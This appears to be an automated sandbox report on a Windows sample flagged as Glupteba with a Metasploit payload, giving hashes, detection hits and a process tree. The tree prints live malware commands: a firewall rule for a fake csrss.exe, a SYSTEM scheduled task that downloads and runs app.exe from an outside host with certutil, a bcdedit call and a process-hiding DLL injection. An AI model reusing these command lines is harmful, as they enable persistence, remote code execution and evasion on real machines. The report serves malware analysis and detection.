Analysis
-
max time kernel
0s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
30/12/2023, 11:19
Static task
static1
Behavioral task
behavioral1
Sample
16fb6fb784a21afbb8bacec7552bd929.exe
Resource
win7-20231129-en
General
-
Target
16fb6fb784a21afbb8bacec7552bd929.exe
-
Size
4.4MB
-
MD5
16fb6fb784a21afbb8bacec7552bd929
-
SHA1
0a6e34cf2284675c70b2456f04ff76e55bf701d0
-
SHA256
3698d34ab2f064964dfefffbdb2a8ef461aa77d23502c046eeca59a13db008f6
-
SHA512
675179bc3faefab41af4c74673544c5313b7f2e8b2b9aae8bb186b6bfa87eb42dc2435cd3bd3b42df151a121fc8d58f49dce121ea9b685dd494d37566b38f876
-
SSDEEP
98304:zRwU5fhKHSNcpTT/J45PhA9hLPgx8cEb73meQrWzMuq:zRwU5fhKRh4gp7vQKHq
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba payload 8 IoCs
resource yara_rule behavioral1/memory/2872-2-0x0000000005070000-0x0000000005996000-memory.dmp family_glupteba behavioral1/memory/2872-3-0x0000000000400000-0x00000000030EF000-memory.dmp family_glupteba behavioral1/memory/2872-4-0x0000000000400000-0x00000000030EF000-memory.dmp family_glupteba behavioral1/memory/2720-8-0x0000000004CF0000-0x0000000005616000-memory.dmp family_glupteba behavioral1/memory/2720-9-0x0000000000400000-0x00000000030EF000-memory.dmp family_glupteba behavioral1/memory/972-22-0x0000000004C50000-0x0000000005576000-memory.dmp family_glupteba behavioral1/memory/2720-19-0x0000000000400000-0x00000000030EF000-memory.dmp family_glupteba behavioral1/memory/972-24-0x0000000000400000-0x00000000030EF000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 2468 netsh.exe -
Modifies boot configuration data using bcdedit 1 IoCs
pid Process 2276 bcdedit.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1056 schtasks.exe 1888 schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\16fb6fb784a21afbb8bacec7552bd929.exe"C:\Users\Admin\AppData\Local\Temp\16fb6fb784a21afbb8bacec7552bd929.exe"1⤵PID:2872
-
C:\Users\Admin\AppData\Local\Temp\16fb6fb784a21afbb8bacec7552bd929.exe"C:\Users\Admin\AppData\Local\Temp\16fb6fb784a21afbb8bacec7552bd929.exe"2⤵PID:2720
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵PID:2636
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵PID:972
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
PID:1056
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵PID:2208
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
PID:1888
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
PID:2276
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵PID:976
-
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231231180540.log C:\Windows\Logs\CBS\CbsPersist_20231231180540.cab1⤵PID:2680
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
PID:2468